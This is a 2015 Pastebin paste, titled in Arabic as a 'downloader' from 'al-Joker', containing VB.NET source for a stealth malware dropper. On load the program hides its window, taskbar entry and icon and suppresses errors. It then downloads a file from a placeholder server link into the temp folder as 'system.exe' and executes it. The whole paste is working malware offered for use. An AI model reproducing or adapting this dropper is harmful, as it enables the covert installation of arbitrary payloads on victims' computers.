Guest User

كود الدنلورد من الجوكر

a guest
Dec 19th, 2015
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. Imports System.Net
  2. Public Class Form1
  3. Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
  4. On Error Resume Next
  5. Me.Hide()
  6. Me.ShowInTaskbar = False
  7. Me.ShowIcon = False
  8. lol()
  9. End Sub
  10. Function lol()
  11. On Error Resume Next
  12. Using wc = New WebClient()
  13. wc.DownloadFile("رابط السيرفر مباشر", Environ("temp") & "\system.exe")
  14. Process.Start(Environ("temp") & "\system.exe")
  15. End Using
  16. End Function
  17. End Class
Add Comment
Please, Sign In to add comment